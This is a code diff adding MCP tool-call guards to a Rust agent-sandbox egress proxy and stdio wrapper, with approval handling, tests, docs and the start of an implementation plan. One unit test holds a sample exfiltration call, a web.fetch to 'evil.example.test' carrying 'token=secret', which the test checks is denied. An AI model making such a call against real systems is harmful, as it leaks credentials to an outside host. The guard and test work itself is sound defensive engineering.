+            let response = response_for_mcp_approval_request(state, route, &decision).await?;
+            Ok((response, request))
+        }
+        agentenv_mcp::guard::GuardAction::Forward
+        | agentenv_mcp::guard::GuardAction::NotToolCall => Ok((None, request)),
+    }
+}
+
+async fn response_for_mcp_approval_request(
+    state: &ProxyState,
+    route: &BrokerRoute,
+    decision: &agentenv_mcp::guard::GuardDecision,
+) -> Result<Option<Response<Body>>> {
+    let Some(coordinator) = state.approval_coordinator.as_ref() else {
+        return Ok(Some(text_response(
+            StatusCode::SERVICE_UNAVAILABLE,
+            "mcp approval unavailable\n",
+        )));
+    };
+    let Some(tool_name) = decision.tool_name.as_ref() else {
+        return Ok(Some(text_response(
+            StatusCode::FORBIDDEN,
+            "mcp tool denied\n",
+        )));
+    };
+
+    let request_id = format!("req_{}", uuid::Uuid::now_v7());
+    let reason_code = mcp_guard_reason_code(decision.reason);
+    let default_scope = if decision.approval_mode == agentenv_proto::McpApprovalMode::PerSession {
+        agentenv_approvals::ApprovalScope::Session
+    } else {
+        agentenv_approvals::ApprovalScope::Once
+    };
+    let request = agentenv_approvals::ApprovalRequest::new(
+        request_id.clone(),
+        state.env_name.clone(),
+        agentenv_approvals::ApprovalKind::McpTool,
+        tool_name.clone(),
+        reason_code,
+        serde_json::json!({
+            "route_id": route.id,
+            "matched_policy": decision.matched_policy,
+            "guard_context": decision.redacted_event_context,
+        }),
+        time::OffsetDateTime::now_utc(),
+        default_scope,
+        Duration::from_secs(60),
+        crate::new_cli_trace_id(),
+    );
+
+    coordinator
+        .submit_request(request)
+        .await
+        .context("submit MCP tool approval request")?;
+    let approval = coordinator
+        .wait_for_decision(&request_id)
+        .await
+        .context("wait for MCP tool approval decision")?;
+
+    match approval.decision {
+        agentenv_approvals::ApprovalDecisionValue::Allow => {
+            if approval.scope == agentenv_approvals::ApprovalScope::Session {
+                let mut states = state
+                    .mcp_guard_states
+                    .lock()
+                    .map_err(|_| anyhow::anyhow!("MCP guard state lock poisoned"))?;
+                states
+                    .entry(route.id.clone())
+                    .or_default()
+                    .grant_session(tool_name.clone());
+            }
+            Ok(None)
+        }
+        agentenv_approvals::ApprovalDecisionValue::Deny => Ok(Some(text_response(
+            StatusCode::FORBIDDEN,
+            "mcp tool denied\n",
+        ))),
+    }
+}
+
+fn request_content_type_is_json(headers: &HeaderMap) -> bool {
+    headers
+        .get(header::CONTENT_TYPE)
+        .and_then(|value| value.to_str().ok())
+        .is_some_and(|value| {
+            value
+                .split(';')
+                .next()
+                .is_some_and(|mime| mime.trim().eq_ignore_ascii_case("application/json"))
+        })
+}
+
+fn emit_mcp_guard_event(
+    state: &ProxyState,
+    route: &BrokerRoute,
+    decision: &agentenv_mcp::guard::GuardDecision,
+) {
+    let Some(tool_name) = decision.tool_name.as_ref() else {
+        return;
+    };
+    let result = match decision.action {
+        agentenv_mcp::guard::GuardAction::Forward
+        | agentenv_mcp::guard::GuardAction::NotToolCall => ActivityResult::Ok,
+        agentenv_mcp::guard::GuardAction::Deny => ActivityResult::Denied,
+        agentenv_mcp::guard::GuardAction::RequestApproval => ActivityResult::PendingApproval,
+    };
+    let mut event = ActivityEvent::new(
+        crate::now_event_ts(),
+        ActivityKind::McpToolCall,
+        result,
+        crate::new_cli_trace_id(),
+    )
+    .with_env(state.env_name.clone())
+    .with_actor_value("kind", serde_json::json!("egress_proxy"))
+    .with_subject_value("route_id", serde_json::json!(route.id))
+    .with_subject_value("tool_name", serde_json::json!(tool_name))
+    .with_extra("guard_context", decision.redacted_event_context.clone())
+    .with_reason_code(mcp_guard_reason_code(decision.reason));
+    if let Some(policy) = decision.matched_policy.as_ref() {
+        event = event.with_subject_value("matched_policy", serde_json::json!(policy));
+    }
+    state.events.emit(event.redacted());
+}
+
+fn mcp_guard_reason_code(reason: agentenv_mcp::guard::GuardReason) -> &'static str {
+    match reason {
+        agentenv_mcp::guard::GuardReason::Disabled => "mcp_guard_disabled",
+        agentenv_mcp::guard::GuardReason::NotToolCall => "mcp_not_tool_call",
+        agentenv_mcp::guard::GuardReason::AllowedByPolicy => "mcp_allowed_by_policy",
+        agentenv_mcp::guard::GuardReason::ApprovalRequired => "mcp_approval_required",
+        agentenv_mcp::guard::GuardReason::UrlAllowlistViolation => "mcp_url_allowlist_violation",
+        agentenv_mcp::guard::GuardReason::CredentialLikeArgument => "mcp_credential_like_argument",
+        agentenv_mcp::guard::GuardReason::EnvVarLikeArgument => "mcp_env_var_like_argument",
+        agentenv_mcp::guard::GuardReason::RateLimited => "mcp_rate_limited",
+        agentenv_mcp::guard::GuardReason::CrossToolFlow => "mcp_cross_tool_flow",
+        agentenv_mcp::guard::GuardReason::MalformedToolCall => "mcp_malformed_tool_call",
+    }
+}
+
 async fn reload_policy(state: &ProxyState) {
     match read_json::<NetworkPolicy>(&state.config.policy_path).await {
         Ok(policy) => *state.policy.write().await = policy,
@@ -694,6 +922,7 @@ mod tests {
             credential_name: "OPENAI_API_KEY".to_owned(),
             request_path_prefix: "/v1/openai".to_owned(),
             allowed_hosts: BTreeSet::from(["api.openai.com".to_owned()]),
+            mcp_guard: None,
         }
     }
 
@@ -705,6 +934,7 @@ mod tests {
             credential_name: "ANTHROPIC_API_KEY".to_owned(),
             request_path_prefix: "/v1/anthropic".to_owned(),
             allowed_hosts: BTreeSet::from(["api.anthropic.com".to_owned()]),
+            mcp_guard: None,
         }
     }
 
@@ -716,6 +946,7 @@ mod tests {
             credential_name: "GITHUB_TOKEN".to_owned(),
             request_path_prefix: "/v1/github/api".to_owned(),
             allowed_hosts: BTreeSet::from(["api.github.com".to_owned()]),
+            mcp_guard: None,
         }
     }
 
@@ -727,6 +958,7 @@ mod tests {
             credential_name: "GITHUB_TOKEN".to_owned(),
             request_path_prefix: "/v1/github/git".to_owned(),
             allowed_hosts: BTreeSet::from(["github.com".to_owned()]),
+            mcp_guard: None,
         }
     }
 
@@ -740,6 +972,7 @@ mod tests {
             credential_name: "MCP_TOKEN".to_owned(),
             request_path_prefix: "/v1/mcp/primary".to_owned(),
             allowed_hosts: BTreeSet::from(["mcp.example.test".to_owned()]),
+            mcp_guard: None,
         }
     }
 
@@ -753,6 +986,7 @@ mod tests {
             credential_name: "oci.ghcr.io".to_owned(),
             request_path_prefix: "/v1/oci/ghcr.io".to_owned(),
             allowed_hosts: BTreeSet::from(["ghcr.io".to_owned()]),
+            mcp_guard: None,
         }
     }
 
@@ -766,6 +1000,7 @@ mod tests {
             credential_name: "MCP_TOKEN".to_owned(),
             request_path_prefix: "/v1/mcp/loopback".to_owned(),
             allowed_hosts: BTreeSet::from(["127.0.0.1".to_owned()]),
+            mcp_guard: None,
         }
     }
 
@@ -871,7 +1106,21 @@ mod tests {
                     })
                     .collect(),
             )),
+            mcp_guard_states: Arc::new(Mutex::new(BTreeMap::new())),
+            approval_coordinator: None,
         }
+    }
+
+    fn test_state_with_approvals(
+        root: &Path,
+        route: BrokerRoute,
+        policy: NetworkPolicy,
+        rate_limits: BTreeMap<String, EgressProxyRateLimit>,
+        approval_coordinator: Option<agentenv_approvals::ApprovalCoordinator>,
+    ) -> ProxyState {
+        let mut state = test_state(root, route, policy, rate_limits);
+        state.approval_coordinator = approval_coordinator;
+        state
     }
 
     #[test]
@@ -983,6 +1232,150 @@ mod tests {
 
         assert_eq!(transformed.headers()["authorization"], "Bearer mcp-real");
         assert_eq!(transformed.uri().path(), "/rpc");
+    }
+
+    #[tokio::test]
+    async fn mcp_guard_denies_url_allowlist_violation_before_credential_resolution() {
+        let root = temp_dir("agentenv-proxy-mcp-guard-deny");
+        fs::create_dir_all(&root).expect("temp dir should be created");
+        let mut route = test_mcp_route();
+        route.upstream_base_url = "https://93.184.216.34/rpc".parse().unwrap();
+        route.allowed_hosts = BTreeSet::from(["93.184.216.34".to_owned()]);
+        route.mcp_guard = Some(agentenv_proto::McpGuardConfig {
+            enabled: true,
+            default_approval: agentenv_proto::McpApprovalMode::Never,
+            tool_policies: [(
+                "web.fetch".to_owned(),
+                agentenv_proto::McpToolPolicy {
+                    url_allowlist: vec!["api.github.com".to_owned()],
+                    ..agentenv_proto::McpToolPolicy::default()
+                },
+            )]
+            .into_iter()
+            .collect(),
+            cross_tool_flows: agentenv_proto::McpCrossToolFlowPolicy::default(),
+        });
+        let policy = policy_with_rules(&["93.184.216.34"], &[]);
+        let state = Arc::new(test_state(&root, route, policy.clone(), BTreeMap::new()));
+        fs::write(
+            &state.config.policy_path,
+            serde_json::to_vec(&policy).expect("policy should serialize"),
+        )
+        .expect("policy should be written");
+        let request = Request::builder()
+            .method("POST")
+            .uri("/v1/mcp/primary")
+            .header("content-type", "application/json")
+            .body(Body::from(
+                serde_json::to_vec(&serde_json::json!({
+                    "jsonrpc": "2.0",
+                    "id": 1,
+                    "method": "tools/call",
+                    "params": {
+                        "name": "web.fetch",
+                        "arguments": {"url": "https://evil.example.test/?token=secret"}
+                    }
+                }))
+                .expect("request body should serialize"),
+            ))
+            .expect("request should build");
+
+        let response = handle_proxy_request(Arc::clone(&state), request)
+            .await
+            .expect("guard denial should be handled");
+
+        assert_eq!(response.status(), StatusCode::FORBIDDEN);
+
+        let _ = fs::remove_dir_all(root);
+    }
+
+    #[tokio::test]
+    async fn mcp_guard_per_call_policy_waits_for_operator_denial() {
+        let root = temp_dir("agentenv-proxy-mcp-guard-approval");
+        fs::create_dir_all(&root).expect("temp dir should be created");
+        let mut route = test_mcp_route();
+        route.upstream_base_url = "https://93.184.216.34/rpc".parse().unwrap();
+        route.allowed_hosts = BTreeSet::from(["93.184.216.34".to_owned()]);
+        route.mcp_guard = Some(agentenv_proto::McpGuardConfig {
+            enabled: true,
+            default_approval: agentenv_proto::McpApprovalMode::PerCall,
+            tool_policies: BTreeMap::new(),
+            cross_tool_flows: agentenv_proto::McpCrossToolFlowPolicy::default(),
+        });
+        let policy = policy_with_rules(&["93.184.216.34"], &[]);
+        let approval_db = root.join("events.db");
+        let coordinator = agentenv_approvals::ApprovalCoordinator::new(
+            agentenv_approvals::ApprovalCoordinatorConfig {
+                store: agentenv_approvals::ApprovalStore::open(&approval_db)
+                    .expect("approval store should open"),
+                events: Arc::new(agentenv_events::NoopEventEmitter),
+                poll_interval: std::time::Duration::from_millis(10),
+                overlay_path: None,
+                proposal_path: None,
+                notifications: None,
+            },
+        );
+        let state = Arc::new(test_state_with_approvals(
+            &root,
+            route,
+            policy.clone(),
+            BTreeMap::new(),
+            Some(coordinator),
+        ));
+        fs::write(
+            &state.config.policy_path,
+            serde_json::to_vec(&policy).expect("policy should serialize"),
+        )
+        .expect("policy should be written");
+        let approval_db_for_decider = approval_db.clone();
+        let decider = tokio::spawn(async move {
+            let store = agentenv_approvals::ApprovalStore::open(&approval_db_for_decider)
+                .expect("approval store should open");
+            loop {
+                let pending = store
+                    .list_requests(agentenv_approvals::ApprovalRequestFilter {
+                        env: Some("demo".to_owned()),
+                        status: Some(agentenv_approvals::ApprovalStatus::Pending),
+                    })
+                    .expect("approval requests should list");
+                if let Some(request) = pending.first() {
+                    store
+                        .record_decision(&agentenv_approvals::ApprovalDecisionRecord {
+                            request_id: request.id.clone(),
+                            decision: agentenv_approvals::ApprovalDecisionValue::Deny,
+                            scope: agentenv_approvals::ApprovalScope::Once,
+                            decided_by: "agentenv:test".to_owned(),
+                            decided_at: time::OffsetDateTime::now_utc(),
+                            reason: Some("test_denial".to_owned()),
+                            context: serde_json::json!({"source": "test"}),
+                            trace_id: request.created_trace_id.clone(),
+                        })
+                        .expect("approval decision should record");
+                    break;
+                }
+                tokio::time::sleep(std::time::Duration::from_millis(10)).await;
+            }
+        });
+        let request = Request::builder()
+            .method("POST")
+            .uri("/v1/mcp/primary")
+            .header("content-type", "application/json")
+            .body(Body::from(
+                r#"{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"filesystem.write","arguments":{"path":"/tmp/a"}}}"#,
+            ))
+            .expect("request should build");
+
+        let response = handle_proxy_request(Arc::clone(&state), request)
+            .await
+            .expect("guard denial should be handled");
+        tokio::time::timeout(std::time::Duration::from_millis(500), decider)
+            .await
+            .expect("approval request should be created and denied")
+            .expect("decider task should finish");
+
+        assert_eq!(response.status(), StatusCode::FORBIDDEN);
+
+        let _ = fs::remove_dir_all(root);
     }
 
     #[test]

--- a/crates/agentenv/tests/cli_behavior.rs
+++ b/crates/agentenv/tests/cli_behavior.rs
@@ -1,7 +1,7 @@
 use std::{
-    collections::BTreeSet,
+    collections::{BTreeMap, BTreeSet},
     fs,
-    io::{Read, Write},
+    io::{BufRead, BufReader, Read, Write},
     path::{Path, PathBuf},
     process::{self, Command, Stdio},
     sync::{
@@ -15,10 +15,16 @@ use std::{
 use agentenv_approvals::{
     sign_payload, ApprovalKind, ApprovalRequest, ApprovalScope, ApprovalStore,
 };
+use agentenv_core::egress_proxy::{BrokerRoute, BrokerService, EgressProxyLaunchConfig};
 use agentenv_events::{
     audit::{AuditSigningKey, AuditStore},
     store::{EventQuery, SqliteEventStore},
     ActivityEvent, ActivityKind, ActivityResult,
+};
+use agentenv_proto::{
+    DnsPolicy, FilesystemPolicy, HttpAccessLevel, InferencePolicy, McpApprovalMode,
+    McpCrossToolFlowPolicy, McpGuardConfig, McpToolPolicy, NetworkAccessPolicy, NetworkPolicy,
+    NetworkRule, NetworkTarget, PolicyReloadability, ProcessPolicy,
 };
 use portable_pty::{native_pty_system, CommandBuilder, PtySize};
 use serde_json::json;
@@ -4663,6 +4669,160 @@ fn approvals_approve_fails_when_request_was_already_denied() {
         .stderr(predicates::str::contains("already decided as deny"));
 }
 
+#[cfg(unix)]
+#[test]
+fn mcp_guard_stdio_cli_forwards_allowed_tool_call_e2e() {
+    let temp = tempfile::tempdir().unwrap();
+    let config_path = temp.path().join("mcp-guard.json");
+    let events_db = temp.path().join("events.db");
+    let upstream = temp.path().join("upstream.sh");
+    let marker = temp.path().join("forwarded.marker");
+    write_mcp_guard_config(&config_path, mcp_guard_config_for_cli_e2e());
+    write_mcp_upstream_script(&upstream);
+
+    let mut child = Command::new(agentenv_bin())
+        .args([
+            "mcp-guard",
+            "run",
+            "--env",
+            "demo",
+            "--config",
+            config_path.to_str().unwrap(),
+            "--events-db",
+            events_db.to_str().unwrap(),
+            "--stdio-upstream",
+            &format!("{} {}", shell_quote(&upstream), shell_quote(&marker)),
+        ])
+        .stdin(Stdio::piped())
+        .stdout(Stdio::piped())
+        .stderr(Stdio::piped())
+        .spawn()
+        .unwrap();
+
+    let response_rx = spawn_mcp_frame_reader(child.stdout.take().unwrap());
+    write_mcp_frame(
+        child.stdin.as_mut().unwrap(),
+        br#"{"jsonrpc":"2.0","id":7,"method":"tools/call","params":{"name":"fs_read","arguments":{"path":"README.md"}}}"#,
+    );
+    drop(child.stdin.take());
+
+    let response = response_rx.recv_timeout(LOCAL_HTTP_TEST_TIMEOUT).unwrap();
+    wait_for_child_exit(&mut child, "mcp-guard allowed stdio e2e");
+    let response_json: serde_json::Value = serde_json::from_slice(&response).unwrap();
+    assert_eq!(response_json["id"], json!(7));
+    assert_eq!(response_json["result"]["ok"], json!(true));
+    assert!(marker.is_file(), "allowed call was not forwarded upstream");
+}
+
+#[cfg(unix)]
+#[test]
+fn mcp_guard_stdio_cli_denies_blocked_tool_call_e2e() {
+    let temp = tempfile::tempdir().unwrap();
+    let config_path = temp.path().join("mcp-guard.json");
+    let events_db = temp.path().join("events.db");
+    let upstream = temp.path().join("upstream.sh");
+    let marker = temp.path().join("forwarded.marker");
+    write_mcp_guard_config(&config_path, mcp_guard_config_for_cli_e2e());
+    write_mcp_upstream_script(&upstream);
+
+    let mut child = Command::new(agentenv_bin())
+        .args([
+            "mcp-guard",
+            "run",
+            "--env",
+            "demo",
+            "--config",
+            config_path.to_str().unwrap(),
+            "--events-db",
+            events_db.to_str().unwrap(),
+            "--stdio-upstream",
+            &format!("{} {}", shell_quote(&upstream), shell_quote(&marker)),
+        ])
+        .stdin(Stdio::piped())
+        .stdout(Stdio::piped())
+        .stderr(Stdio::piped())
+        .spawn()
+        .unwrap();
+
+    let response_rx = spawn_mcp_frame_reader(child.stdout.take().unwrap());
+    write_mcp_frame(
+        child.stdin.as_mut().unwrap(),
+        br#"{"jsonrpc":"2.0","id":8,"method":"tools/call","params":{"name":"web_fetch","arguments":{"url":"https://blocked.example.test/private"}}}"#,
+    );
+    drop(child.stdin.take());
+
+    let response = response_rx.recv_timeout(LOCAL_HTTP_TEST_TIMEOUT).unwrap();
+    wait_for_child_exit(&mut child, "mcp-guard denied stdio e2e");
+    let response_json: serde_json::Value = serde_json::from_slice(&response).unwrap();
+    assert_eq!(response_json["id"], json!(8));
+    assert_eq!(response_json["error"]["code"], json!(-32004));
+    assert!(
+        !marker.exists(),
+        "denied call must not be forwarded to upstream"
+    );
+}
+
+#[test]
+fn proxy_cli_enforces_mcp_guard_policy_e2e() {
+    let temp = tempfile::tempdir().unwrap();
+    let runtime_root = temp.path().join(".agentenv");
+    let env_dir = runtime_root.join("envs").join("demo");
+    fs::create_dir_all(&env_dir).unwrap();
+    let events_db = env_dir.join("events.db");
+    let policy_path = temp.path().join("policy.json");
+    let config_path = temp.path().join("proxy-config.json");
+    let port = reserve_tcp_port();
+    let listen_url = format!("http://127.0.0.1:{port}").parse().unwrap();
+    let config = EgressProxyLaunchConfig {
+        env_name: "demo".to_owned(),
+        listen_url,
+        routes: vec![BrokerRoute {
+            id: "mcp.context".to_owned(),
+            service: BrokerService::Mcp {
+                route_id: "context".to_owned(),
+            },
+            upstream_base_url: "https://93.184.216.34/rpc".parse().unwrap(),
+            credential_name: "MCP_TOKEN".to_owned(),
+            request_path_prefix: "/v1/mcp/context".to_owned(),
+            allowed_hosts: BTreeSet::from(["93.184.216.34".to_owned()]),
+            mcp_guard: Some(mcp_guard_config_for_cli_e2e()),
+        }],
+        credential_names: Vec::new(),
+        policy_path: policy_path.clone(),
+        rate_limits: BTreeMap::new(),
+    };
+    fs::write(&config_path, serde_json::to_vec_pretty(&config).unwrap()).unwrap();
+    fs::write(
+        &policy_path,
+        serde_json::to_vec_pretty(&mcp_proxy_policy_for_cli_e2e()).unwrap(),
+    )
+    .unwrap();
+
+    let mut proxy = spawn_proxy_run(temp.path(), &config_path, &events_db, port);
+    let client = reqwest::blocking::Client::builder()
+        .no_proxy()
+        .timeout(LOCAL_HTTP_TEST_TIMEOUT)
+        .build()
+        .unwrap();
+    let response = client
+        .post(format!("http://127.0.0.1:{port}/v1/mcp/context"))
+        .json(&json!({
+            "jsonrpc": "2.0",
+            "id": 9,
+            "method": "tools/call",
+            "params": {
+                "name": "web_fetch",
+                "arguments": {"url": "https://blocked.example.test/private"}
+            }
+        }))
+        .send()
+        .unwrap();
+    assert_eq!(response.status(), reqwest::StatusCode::FORBIDDEN);
+    assert_eq!(response.text().unwrap(), "mcp tool denied\n");
+
+    proxy.stop();
+}
+
 #[test]
 fn approvals_watch_once_json_prints_pending_requests() {
     let temp = tempfile::tempdir().unwrap();
@@ -6700,6 +6860,220 @@ fn seed_pending_approval(home: &Path, env: &str, request_id: &str) {
         "trace-approval-1",
     );
     store.insert_request(&request).unwrap();
+}
+
+fn mcp_guard_config_for_cli_e2e() -> McpGuardConfig {
+    McpGuardConfig {
+        enabled: true,
+        default_approval: McpApprovalMode::Never,
+        tool_policies: BTreeMap::from([
+            (
+                "fs_read".to_owned(),
+                McpToolPolicy {
+                    approval: Some(McpApprovalMode::Never),
+                    ..McpToolPolicy::default()
+                },
+            ),
+            (
+                "web_fetch".to_owned(),
+                McpToolPolicy {
+                    approval: Some(McpApprovalMode::Never),
+                    url_allowlist: vec!["https://allowed.example.test".to_owned()],
+                    ..McpToolPolicy::default()
+                },
+            ),
+        ]),
+        cross_tool_flows: McpCrossToolFlowPolicy::default(),
+    }
+}
+
+fn write_mcp_guard_config(path: &Path, config: McpGuardConfig) {
+    fs::write(path, serde_json::to_vec_pretty(&config).unwrap()).unwrap();
+}
+
+fn mcp_proxy_policy_for_cli_e2e() -> NetworkPolicy {
+    NetworkPolicy {
+        network: NetworkAccessPolicy {
+            reloadability: PolicyReloadability::HotReload,
+            allow: vec![NetworkRule {
+                target: NetworkTarget::Host {
+                    host: "93.184.216.34".to_owned(),
+                    port: Some(443),
+                    scheme: Some("https".to_owned()),
+                    http_access: Some(HttpAccessLevel::Full),
+                },
+            }],
+            deny: Vec::new(),
+            approval_required: Vec::new(),
+            dns: DnsPolicy::default(),
+        },
+        filesystem: FilesystemPolicy {
+            reloadability: PolicyReloadability::LockedAtCreate,
+            read_only: Vec::new(),
+            read_write: Vec::new(),
+        },
+        process: ProcessPolicy {
+            reloadability: PolicyReloadability::LockedAtCreate,
+            run_as_user: "agent".to_owned(),
+            run_as_group: "agent".to_owned(),
+            profile: "default".to_owned(),
+            allow_syscalls: Vec::new(),
+            deny_syscalls: Vec::new(),
+        },
+        inference: InferencePolicy {
+            reloadability: PolicyReloadability::HotReload,
+            routes: Vec::new(),
+        },
+    }
+}
+
+#[cfg(unix)]
+fn write_mcp_upstream_script(path: &Path) {
+    use std::os::unix::fs::PermissionsExt;
+
+    let body = r#"{"jsonrpc":"2.0","id":7,"result":{"ok":true}}"#;
+    fs::write(
+        path,
+        format!(
+            r#"#!/bin/sh
+IFS= read -r header || exit 0
+IFS= read -r blank || exit 0
+len=$(printf '%s' "$header" | tr -dc '0-9')
+dd bs=1 count="$len" of=/dev/null 2>/dev/null
+touch "$1"
+printf 'Content-Length: {}\r\n\r\n{}'
+"#,
+            body.len(),
+            body
+        ),
+    )
+    .unwrap();
+    fs::set_permissions(path, fs::Permissions::from_mode(0o755)).unwrap();
+}
+
+#[cfg(unix)]
+fn shell_quote(path: &Path) -> String {
+    format!("'{}'", path.to_string_lossy().replace('\'', "'\\''"))
+}
+
+fn write_mcp_frame(writer: &mut impl Write, body: &[u8]) {
+    write!(writer, "Content-Length: {}\r\n\r\n", body.len()).unwrap();
+    writer.write_all(body).unwrap();
+    writer.flush().unwrap();
+}
+
+fn spawn_mcp_frame_reader(stdout: process::ChildStdout) -> std::sync::mpsc::Receiver<Vec<u8>> {
+    let (tx, rx) = std::sync::mpsc::channel();
+    thread::spawn(move || {
+        let mut reader = BufReader::new(stdout);
+        let frame = read_mcp_frame(&mut reader);
+        let _ = tx.send(frame);
+    });
+    rx
+}
+
+fn read_mcp_frame(reader: &mut impl BufRead) -> Vec<u8> {
+    let mut content_length = None;
+    let mut line = String::new();
+    loop {
+        line.clear();
+        let count = reader.read_line(&mut line).unwrap();
+        assert!(count != 0, "MCP child closed stdout before frame headers");
+        let trimmed = line.trim_end_matches(['\r', '\n']);
+        if trimmed.is_empty() {
+            break;
+        }
+        if let Some((name, value)) = trimmed.split_once(':') {
+            if name.eq_ignore_ascii_case("content-length") {
+                content_length = Some(value.trim().parse::<usize>().unwrap());
+            }
+        }
+    }
+    let length = content_length.expect("MCP frame should include content length");
+    let mut body = vec![0; length];
+    reader.read_exact(&mut body).unwrap();
+    body
+}
+
+fn wait_for_child_exit(child: &mut process::Child, label: &str) {
+    let deadline = Instant::now() + LOCAL_HTTP_TEST_TIMEOUT;
+    loop {
+        match child.try_wait().unwrap() {
+            Some(status) if status.success() => return,
+            Some(status) => {
+                let stderr = child_stderr(child);
+                panic!("{label} exited with {status}; stderr was: {stderr}");
+            }
+            None if Instant::now() < deadline => thread::sleep(Duration::from_millis(20)),
+            None => {
+                let _ = child.kill();
+                let _ = child.wait();
+                let stderr = child_stderr(child);
+                panic!("{label} did not exit; stderr was: {stderr}");
+            }
+        }
+    }
+}
+
+struct ProxyRunChild {
+    child: process::Child,
+}
+
+impl Drop for ProxyRunChild {
+    fn drop(&mut self) {
+        self.stop();
+    }
+}
+
+impl ProxyRunChild {
+    fn stop(&mut self) {
+        if self.child.try_wait().unwrap().is_none() {
+            let _ = self.child.kill();
+            let _ = self.child.wait();
+        }
+    }
+}
+
+fn spawn_proxy_run(home: &Path, config_path: &Path, events_db: &Path, port: u16) -> ProxyRunChild {
+    let mut child = Command::new(agentenv_bin())
+        .env("HOME", home)
+        .args([
+            "proxy",
+            "run",
+            "--env",
+            "demo",
+            "--config",
+            config_path.to_str().unwrap(),
+            "--events-db",
+            events_db.to_str().unwrap(),
+        ])
+        .stdout(Stdio::null())
+        .stderr(Stdio::piped())
+        .spawn()
+        .unwrap();
+
+    let client = reqwest::blocking::Client::builder()
+        .no_proxy()
+        .timeout(Duration::from_secs(1))
+        .build()
+        .unwrap();
+    let url = format!("http://127.0.0.1:{port}/__ready");
+    let deadline = Instant::now() + LOCAL_HTTP_TEST_TIMEOUT;
+    while Instant::now() < deadline {
+        if let Some(status) = child.try_wait().unwrap() {
+            let stderr = child_stderr(&mut child);
+            panic!("proxy run exited before listening: {status}; stderr was: {stderr}");
+        }
+        if client.get(&url).send().is_ok() {
+            return ProxyRunChild { child };
+        }
+        thread::sleep(Duration::from_millis(50));
+    }
+
+    let _ = child.kill();
+    let _ = child.wait();
+    let stderr = child_stderr(&mut child);
+    panic!("timed out waiting for proxy run to listen; stderr was: {stderr}");
 }
 
 fn reserve_tcp_port() -> u16 {

--- a/docs/ARCHITECTURE.md
+++ b/docs/ARCHITECTURE.md
@@ -180,6 +180,14 @@ MCP runs over several transports; drivers shouldn't know or care. We abstract th
 
 This is the same pattern VNC uses (RFB over TCP / TLS / SSH / WebSocket). Transport is orthogonal to content.
 
+### MCP tool-call guards
+
+When `policy.mcp.confused_deputy_guards.enabled` is true, core rewrites the
+agent-visible `McpEndpoint` through a guard. HTTP and HTTP+SSE endpoints are
+guarded in the host egress proxy; stdio endpoints are guarded by an
+`agentenv mcp-guard run` wrapper. Context drivers still return ordinary
+`McpEndpoint` values and agent drivers still render ordinary MCP config.
+
 ---
 
 ## Driver architecture

--- a/docs/BLUEPRINTS.md
+++ b/docs/BLUEPRINTS.md
@@ -69,6 +69,40 @@ When DNS policy is active, the sandbox must use the driver-managed DNS guard,
 and direct DNS, DoT, or DoH bypass traffic must be denied. Drivers that cannot
 enforce those controls must report `supports_dns_egress_control = false`.
 
+## MCP Tool-Call Guards
+
+Blueprints may opt into core-mediated MCP tool-call guards under
+`policy.mcp.confused_deputy_guards`. Reference blueprints keep this block
+commented out by default so existing templates remain runnable without approval
+prompts.
+
+```yaml
+policy:
+  tier: restricted
+  mcp:
+    confused_deputy_guards:
+      enabled: true
+      default_approval: per-call
+      tool_policies:
+        "filesystem.read":
+          approval: never
+          rate_limit: 50/session
+        "web.fetch":
+          approval: per-call
+          url_allowlist:
+            - api.github.com
+            - crates.io
+          redact_args: true
+        "*.write":
+          approval: per-session
+      cross_tool_flows:
+        forbid_read_to_write_turns: 5
+```
+
+When enabled, HTTP and HTTP+SSE MCP endpoints are guarded in the host egress
+proxy. Stdio MCP endpoints are wrapped with `agentenv mcp-guard run` before the
+agent driver renders MCP config.
+
 ## Getting-Started Filesystem Blueprints
 
 `claude+filesystem+openshell.yaml`, `codex+filesystem+openshell.yaml`, and `openclaw+filesystem+openshell.yaml` mount `~/projects` through the filesystem context driver and expose it over MCP inside OpenShell. They are the lowest-friction templates because they do not require remote context infrastructure.

--- a/docs/DRIVER_PROTOCOL.md
+++ b/docs/DRIVER_PROTOCOL.md
@@ -232,6 +232,10 @@ the no-context sentinel and should be skipped when rendering agent MCP config.
 Filesystem context endpoints encode the stdio command in `McpEndpoint.url` until a
 future protocol version splits stdio command and arguments into separate fields.
 
+Core may rewrite an `McpEndpoint` for guard mediation before passing it to an
+agent driver. This is not a driver protocol change; context drivers continue to
+report the unmediated endpoint they provision.
+
 #### `InferenceDriver`
 
 | Method | Params | Result |

--- a/docs/superpowers/plans/2026-05-15-issue-42-mcp-confused-deputy-guards.md
+++ b/docs/superpowers/plans/2026-05-15-issue-42-mcp-confused-deputy-guards.md
@@ -1,0 +1,1384 @@
+# MCP Confused-Deputy Guards Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Implement issue #42 by mediating all agent-visible MCP tool calls through core-owned guards for HTTP/HTTP+SSE and stdio MCP transports.
+
+**Architecture:** Add pure MCP guard policy and evaluation code in `agentenv-mcp`, wire guard config and endpoint rewriting in `agentenv-core`, extend the existing egress proxy to guard URL-based MCP calls, and add a hidden `agentenv mcp-guard run` stdio wrapper. The guard emits redacted `mcp_tool_call` events and uses the existing approvals queue for approval-required decisions.
+
+**Tech Stack:** Rust workspace, existing `serde`/`serde_json`/`serde_yaml`, `tokio`, `axum`, `reqwest`, `agentenv-events`, `agentenv-approvals`, `agentenv-proto`, existing egress proxy and runtime setup code.
+
+---
+
+## File Structure
+
+```
+crates/agentenv-proto/src/types.rs
+crates/agentenv-proto/build.rs
+crates/agentenv-mcp/Cargo.toml
+crates/agentenv-mcp/src/lib.rs
+crates/agentenv-mcp/src/guard.rs
+crates/agentenv-core/src/lifecycle.rs
+crates/agentenv-core/src/runtime.rs
+crates/agentenv-core/src/egress_proxy.rs
+crates/agentenv/src/main.rs
+crates/agentenv/src/proxy_cli.rs
+crates/agentenv/src/mcp_guard_cli.rs
+docs/ARCHITECTURE.md
+docs/BLUEPRINTS.md
+docs/DRIVER_PROTOCOL.md
+blueprints/claude+filesystem+openshell.yaml
+blueprints/codex+filesystem+openshell.yaml
+blueprints/claude+mcp-generic+openshell.yaml
+blueprints/codex+mcp-generic+openshell.yaml
+```
+
+Responsibilities:
+
+- `agentenv-proto/src/types.rs`: serializable MCP guard config types used by core, proxy launch config, and MCP evaluator without adding crate dependency cycles.
+- `agentenv-mcp/src/guard.rs`: policy matching, JSON-RPC request parsing, argument redaction/summarization, URL allowlist checks, rate counters, read-to-write session flow checks, and pure evaluation result types.
